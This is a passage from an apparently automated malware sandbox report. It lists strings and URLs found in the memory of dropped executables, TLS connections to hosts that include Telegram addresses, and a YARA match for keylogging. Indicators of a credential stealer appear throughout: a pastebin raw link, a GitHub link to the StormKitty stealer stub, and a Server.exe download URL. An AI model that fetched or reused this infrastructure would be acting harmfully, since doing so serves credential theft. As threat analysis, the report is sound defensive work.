                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                      Source: explorer.exe, 00000002.00000000.1785022693.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                      Source: prefs.js.1.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: svchost.exe, 00000003.00000003.1807789448.00000214783C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: explorer.exe, 00000002.00000002.3176869488.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.00000000029E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.000000000258F000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E5D000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe.2.dr, 4336.tmp.Server.exe.2.drString found in binary or memory: https://pastebin.com/raw/7B75u64B
                      Source: 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/7B7P&Z
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/7B7P:
                      Source: explorer.exe, 00000002.00000002.3176869488.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                      Source: 4336.tmp.Server.exe, 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, 476D.tmp.Server.exe.2.dr, 4336.tmp.Server.exe.2.drString found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                      Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, svchost.exe, 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, jqnnpe.exe, 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, jqnnpe.exe.24.dr, 4BC4.tmp.Client.exe.2.drString found in binary or memory: https://steamcommunity.com/profiles/ASOFTWARE
                      Source: tmp853A.tmp.dat.9.drString found in binary or memory: https://support.mozilla.org
                      Source: tmp853A.tmp.dat.9.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: tmp853A.tmp.dat.9.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                      Source: tmp5A30.tmp.dat.39.dr, History.txt.6.dr, tmp1126.tmp.dat.39.dr, tmpB795.tmp.dat.10.dr, History.txt.9.dr, tmp835D.tmp.dat.9.dr, tmp7758.tmp.dat.6.dr, History.txt0.10.dr, tmp361D.tmp.dat.10.dr, tmp7718.tmp.dat.6.dr, tmp836E.tmp.dat.9.dr, History.txt0.39.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: tmp5A30.tmp.dat.39.dr, tmp1126.tmp.dat.39.dr, tmpB795.tmp.dat.10.dr, tmp835D.tmp.dat.9.dr, tmp7758.tmp.dat.6.dr, tmp361D.tmp.dat.10.dr, tmp7718.tmp.dat.6.dr, tmp836E.tmp.dat.9.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                      Source: tmp5A30.tmp.dat.39.dr, History.txt.6.dr, tmp1126.tmp.dat.39.dr, tmpB795.tmp.dat.10.dr, History.txt.9.dr, tmp835D.tmp.dat.9.dr, tmp7758.tmp.dat.6.dr, History.txt0.10.dr, tmp361D.tmp.dat.10.dr, tmp7718.tmp.dat.6.dr, tmp836E.tmp.dat.9.dr, History.txt0.39.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                      Source: tmp5A30.tmp.dat.39.dr, tmp1126.tmp.dat.39.dr, tmpB795.tmp.dat.10.dr, tmp835D.tmp.dat.9.dr, tmp7758.tmp.dat.6.dr, tmp361D.tmp.dat.10.dr, tmp7718.tmp.dat.6.dr, tmp836E.tmp.dat.9.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000002.00000002.3176869488.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                      Source: explorer.exe, 00000002.00000002.3176869488.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                      Source: prefs.js.1.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/help
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/home
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/login
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: prefs.js.1.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.igenius.org/Server.exe
                      Source: tmp853A.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org
                      Source: tmp853A.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: tmp853A.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024C6000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, History.txt.10.dr, History.txt0.6.dr, History.txt.39.dr, History.txt0.9.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
                      Source: tmp7C70.tmp.dat.6.dr, tmp1732.tmp.dat.39.dr, tmp5850.tmp.dat.10.dr, places.raw.10.dr, tmp853A.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: tmp853A.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: tmp7C70.tmp.dat.6.dr, tmp1732.tmp.dat.39.dr, tmp5850.tmp.dat.10.dr, places.raw.10.dr, tmp853A.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                      Source: explorer.exe, 00000002.00000000.1785022693.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                      Source: explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.209.71:443 -> 192.168.2.4:49757 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49767 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49822 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49826 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49841 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49857 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49858 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49859 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.209.71:443 -> 192.168.2.4:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:49882 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49887 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:49891 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49892 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49895 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49903 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49926 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49938 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: Yara matchFile source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
